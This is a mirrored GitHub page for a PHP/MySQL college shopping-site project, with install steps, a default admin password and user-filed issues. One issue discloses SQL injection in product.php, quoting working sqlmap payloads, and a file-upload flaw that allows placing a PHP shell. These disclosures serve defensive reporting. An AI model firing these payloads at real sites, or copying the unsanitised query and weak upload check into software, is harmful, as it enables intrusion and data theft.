Giter Site home page Giter Site logo

puneethreddyhc / online-shopping-system Goto Github PK

View Code? Open in Web Editor NEW
309.0 14.0 182.0 20.44 MB

demo

Home Page: https://youtu.be/gLwfj67GI8A

License: Apache License 2.0

PHP 79.50% Hack 20.50%
php dbms-project project computer-science admin online-shop php-project mysql admin-pages college-project

online-shopping-system's Introduction

GitHub

Buy Me A Coffee

Updated project with extra Features like WISHLIST, List Orders, add Reviews, updated routing, resolved search bug is available for Premium

Youtube Video

Any DBMS OR WEB TECHNOLOGIES (php, django, angular or react) or MachineLearning projects with installation support and code explaination for Premium contact phone: +919535688928 gmail: [email protected] or visit : http://www.notes4free.in/services.html

online-shopping-with-advanced-admin-page

Updated version

online shopping system is a [DBMS project] with both admin and user layouts.

Installation

  1. Install XAMPP or WAMPP.

  2. Open XAMPP Control panal and start [apache] and [mysql] .

  3. Download project from github(https://github.com/PuneethReddyHC/online-shopping-system-with-advanced-admin-page.git)
    OR follow gitbash commands

    i>cd C:\xampp\htdocs\

    ii>git clone https://github.com/PuneethReddyHC/online-shopping-system-with-advanced-admin-page.git

  4. extract files in C:\xampp\htdocs.

  5. open link localhost/phpmyadmin

  6. click on new at side navbar.

  7. give a database name as (onlineshop) hit on create button.

  8. after creating database name click on import.

  9. browse the file in directory[online-shopping-system-with-advanced-admin-page/database/onlineshop.sql].

  10. after importing successfully.

  11. open any browser and type http://localhost/online-shopping-system-with-advanced-admin-page-master.

  12. first register and then login

  13. admin login details Email=[email protected] or username = admin and Password=123456789.

If you like my project

Bye me Cup of coffee

Google pay or phonepay number 9535688928

visit my other repository with different admin pages with below link

https://github.com/PuneethReddyHC/online-shopping-system-advanced

https://github.com/PuneethReddyHC/event-management

If you like my project hit a star button

Screenshots

Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser Image of adduser

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

online-shopping-system's People

Contributors

puneethreddyhc avatar punehemu avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

online-shopping-system's Issues

SQL Injection & affected by Arbitrary File Upload

SQL Injection

The online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks.

The p parameter on the /product.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.
Poc's
SQLMAP PAYLOADS
p parameter on the /product.php page
pocs

GET parameter 'p' is vulnerable. Do you want to keep testing the others (if any)
? [y/N]

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) re
quests:
---
Parameter: p (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=72 AND 2037=2037

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: p=72 AND (SELECT 1432 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SEL
ECT (ELT(1432=1432,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=72 AND (SELECT 2289 FROM (SELECT(SLEEP(5)))LMdY)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: p=72 UNION ALL SELECT CONCAT(0x7178707671,0x4b71516d647848537741636
571634e5a416a6a7a716367744d47654778554952467778625161716f,0x716b6a6a71),NULL,NUL
L,NULL,NULL,NULL,NULL,NULL-- -
---
[20:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP, PHP 5.5.9
back-end DBMS: MySQL >= 5.0

image

affected by Arbitrary File Upload

affected by Arbitrary File Upload at add_products line 22,Only verified Content-Type,so ,can modify Content-Type:
image
image/jpeg
image
filepath is ../product_images/1635249699_shell.php

Random Page after Login

I don't know why but when i login into my account i am redirected to homepage but initally it shows "2023" on the page and when we refresh it, it brings back to orignal working homepage. i also searched in all directories for this bug but couldn't find it. check this sir and reply me when you are free.
Uploading Screenshot (35).png…

change currency

where do I change the currency from usd to my preferred one?

zip is not extracting

This message is display while extracting the project file, "The archive is corrupt".

request

Can i get Synopsis for online -shopping -system .

Error during Login

When we enter a wrong password / email during login. It displays this error messege:-

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\Test1\login.php on line 17

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\Test1\login.php on line 18
Please Register before login..!
Screenshot (34)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.